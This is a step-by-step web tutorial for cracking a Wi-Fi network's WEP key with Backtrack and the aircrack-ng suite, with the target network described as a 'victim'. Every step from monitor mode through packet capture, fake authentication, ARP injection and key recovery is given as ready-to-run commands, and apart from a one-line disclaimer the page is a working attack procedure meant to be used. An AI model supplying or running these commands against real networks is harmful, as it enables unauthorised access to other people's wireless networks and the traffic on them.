Crack WEP Wifi Password

Tools Needed:
  • Backtrack with aircrack-ng installed
  • Wi-Fi adapter capable of injecting packets.
Note: We are not responsible for any illegal attempts.

I am using Alfa AWUS036H most used CARD & simulates perfect with Backtrack.
Check your wifi compatible lists here.
Step 1:
Run Backtrack And plugin your Wifi adpter.
Open New konsole and type : ifconfig wlan0 up
.Step 2:
wlan0 is the name of the wireless card that i used, It can also be different.
To Check all wireless cards that are connected to your system, Type: ” iwconfig “.
Step 3:
Now Set your WiFi Adapter on Monitor Mode
Monitor mode lets your router to listen almost every packet in air.
To enable monitor mode, Type : airmon-ng start (your interface)
Example :- airmon-ng start wlan0
.Step 4:
New interface mon0 has been created.
To check your new interface, Type: “iwconfig mon0” as shown in fig.
.Step 5:
Now find a Network protected by WEP key.
To discover surrounding networks, Type : airodump-ng mon0
BSSID == Mac address of the AP.
CH == Channel broadcasted in which AP.
ESSID == Name broadcasted by the AP
Cipher == Shows encryption type
Step 6:
Now check for network, My Victim for this tutorial is ” linksys ”
To Crack it’s Password or we can say WEP Key, you have to capture Victim’s Data into file.
We again use airodump tool to target a specific AP and channel. You must restrict monitoring to single Channel to get data boost-up.
Type: airodump-ng mon0 –bssid -c (channel ) -w (file name to save )
As my Victim is broadcasted in channel 6, with BSSID “98:fc:11:c9:14:22″
So i Save the captured DATA as “RHAWEP”
Type : airodump-ng mon0 –bssid 98:fc:11:c9:14:22 -c 6 -w RHAWEP
Step 7:
To Crack password at-least 20,000 packets must be captured, 2 methods are being used for this purpose.
1st method == Passive attack: Wait for the Victim to connect to AP & then start Capture packets, This is a bit slower method.
2nd method == Active attack: You have to make a fake authentication (connect) with AP by generating and injecting packets, This is fast method and i am also using this method.
Active method can be done by this commands. Type : aireplay-ng – 1 3 -a (bssid of the target ) (interface)
I am using this command aireplay-ng -1 3 -a 98:fc:11:c9:14:22 mon0
Step 8:
After successfully done with fake authentication, Now generate & inject ARP packets.
Open a new konsole and type : aireplay-ng 3 -b (bssid of target) -h ( Mac address of mon0) (interface)
In my Case: aireplay-ng 3 -b 98:fc:11:c9:14:22 -h 00:c0:ca:50:f8:32 mon0
If this step was successfully done you will see a lot of packets in airodump capture.
.Step 9:
Now Keep calm and wait for 20,000 packets. It would be much easier if you wait for 80-90K packets.
After getting enough packets, Click on the mark present on terminal.
Step 10:
Open a new konsole & Enter the below command to Crack WEP Key.
Type: aircrack-ng (name of the file )
In my Case i used : aircrack-ng RHAWEP-0.1-cap
Aircrak will crack the WEP key within few minutes.
.Note :
Once you get the output, Remove colons and you’ll get WEP Key.